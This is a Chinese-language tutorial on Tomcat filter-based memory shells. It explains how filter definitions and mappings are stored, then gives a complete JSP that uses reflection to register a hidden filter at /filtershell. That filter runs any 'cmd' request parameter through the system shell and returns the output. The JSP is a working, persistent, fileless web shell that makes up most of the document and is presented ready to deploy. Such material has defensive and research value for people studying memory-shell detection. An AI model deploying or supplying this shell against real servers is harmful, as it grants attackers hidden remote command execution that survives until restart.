web.xml配置Filter
    image.png
    调试点image.png

    主要有这几个关键类存储我们在web.xml中的属性
    image.png
    image.png代码中的context.findFilterMaps() 即是我们创建的filter存储的地方
    可以看到filterConfigs除了存放了filterDef还保存了当时的context.

    • filterConfigs
    • filterDefs
    • filterDef
    • filterMaps

    filterDef相当于web.xml中的

    1.   <filter>
    2.     <filter-name>FilterTest</filter-name>
    3.     <filter-class>com.sorry.bug.CustomFilter</filter-class>
    4.   </filter>

    filterMaps中则存储了web.xml中的,不过按照顺序来存储.

    1.   <filter-mapping>
    2.     <filter-name>FilterTest</filter-name>
    3.     <url-pattern>/filtertest</url-pattern>
    4.   </filter-mapping>

    那么要想注入filter型内存马,则需要替代web.xml实现注入.

    1. 创建恶意filter
    2. 用filterDef将filter封装
    3. 将filterDef添加到filterDefs和filterConfigs中
    4. 创建一个新的filterMap将url和filter进行绑定,并添加到filterMaps中

    要注意的是,因为filter生效会有一个先后顺序,所以一般来讲我们还需要把我们的filter给移动到FilterChain的第一位去.
    每次请求createFilterChain都会依据此动态生成一个过滤链,而StandardContext又会一直保留到Tomcat生命周期结束,所以我们的内存马就可以一直驻留下去,直到Tomcat重启.

    1. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
    2. <%@ page import = "org.apache.catalina.Context" %>
    3. <%@ page import = "org.apache.catalina.core.ApplicationContext" %>
    4. <%@ page import = "org.apache.catalina.core.ApplicationFilterConfig" %>
    5. <%@ page import = "org.apache.catalina.core.StandardContext" %>
    7. <!-- tomcat 8/9 -->
    8. <%@page import = "org.apache.tomcat.util.descriptor.web.FilterMap"%>
    9. <%@page import = "org.apache.tomcat.util.descriptor.web.FilterDef"%>
    11. <!-- tomcat 7 -->
    12. <!--org.apache.catalina.deploy.FilterMap"
    13.   " org.apache.catalina.deploy.FilterDef"
    14. -->
    16. <%@ page import = "javax.servlet.*" %>
    17. <%@ page import = "javax.servlet.annotation.WebServlet" %>
    18. <%@ page import = "javax.servlet.http.HttpServlet" %>
    19. <%@ page import = "javax.servlet.http.HttpServletRequest" %>
    20. <%@ page import = "javax.servlet.http.HttpServletResponse" %>
    21. <%@ page import = "java.io.IOException" %>
    22. <%@ page import = "java.lang.reflect.Constructor" %>
    23. <%@ page import = "java.lang.reflect.Field" %>
    24. <%@ page import = "java.lang.reflect.InvocationTargetException" %>
    25. <%@ page import = "java.util.Map" %>
    26. <%@ page import="java.io.PrintWriter" %>
    29. <%
    30.     class InsertFilter implements Filter {
    31.         @Override
    32.         public void init(FilterConfig filterConfig) throws ServletException {
    33.         }
    34.         public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    35.             HttpServletRequest req = (HttpServletRequest) servletRequest;
    36.             HttpServletResponse rsp = (HttpServletResponse) servletResponse;
    37.             String command = req.getParameter("cmd");
    38.             PrintWriter writer = rsp.getWriter();
    39.             if (command != null) {
    40.                 String o = "";
    41.                 java.lang.ProcessBuilder p;
    42.                 if(System.getProperty("os.name").toLowerCase().contains("win")){
    43.                     p = new java.lang.ProcessBuilder("cmd.exe", "/c", command);
    44.                 }else{
    45.                     p = new java.lang.ProcessBuilder("/bin/sh", "-c", command);
    46.                 }
    47.                 java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
    48.                 o = c.hasNext() ? c.next(): o;
    49.                 c.close();
    50.                 writer.write(o);
    51.                 writer.flush();
    52.                 writer.close();
    53.             }
    54.             filterChain.doFilter(servletRequest, servletResponse);
    55.         }
    56.         public void destroy() {}
    58.     }
    59. %>
    61. <%
    62.     String name="InsertFilter";
    63.     //ServletContext servletContext = request.getServletContext();
    64.     ServletContext servletContext = request.getSession().getServletContext();
    66.     Field appctx = servletContext.getClass().getDeclaredField("context");
    67.     appctx.setAccessible(true);
    68.     ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
    69.     Field stdctx = applicationContext.getClass().getDeclaredField("context");
    70.     stdctx.setAccessible(true);
    71.     StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
    72.     Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    73.     Configs.setAccessible(true);
    74.     Map filterConfigs = (Map) Configs.get(standardContext);
    76.     if(filterConfigs.get(name) == null){
    77.         InsertFilter insertFilter = new InsertFilter();
    79.         FilterDef filterDef = new FilterDef();
    80.         filterDef.setFilterName(name);
    81.         filterDef.setFilterClass(insertFilter.getClass().getName());
    82.         filterDef.setFilter(insertFilter);
    83.         standardContext.addFilterDef(filterDef);
    85.         FilterMap filterMap = new FilterMap();
    86.         filterMap.addURLPattern("/filtershell");
    87.         filterMap.setFilterName(name);
    88.         filterMap.setDispatcher(DispatcherType.REQUEST.name());
    89.         standardContext.addFilterMapBefore(filterMap);
    91.         Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
    92.         constructor.setAccessible(true);
    93.         ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);
    95.         filterConfigs.put(name,filterConfig);
    96.         out.write("Inject Success");
    97.     }else{
    98.         out.write("Injected");
    99.     }
    101. %>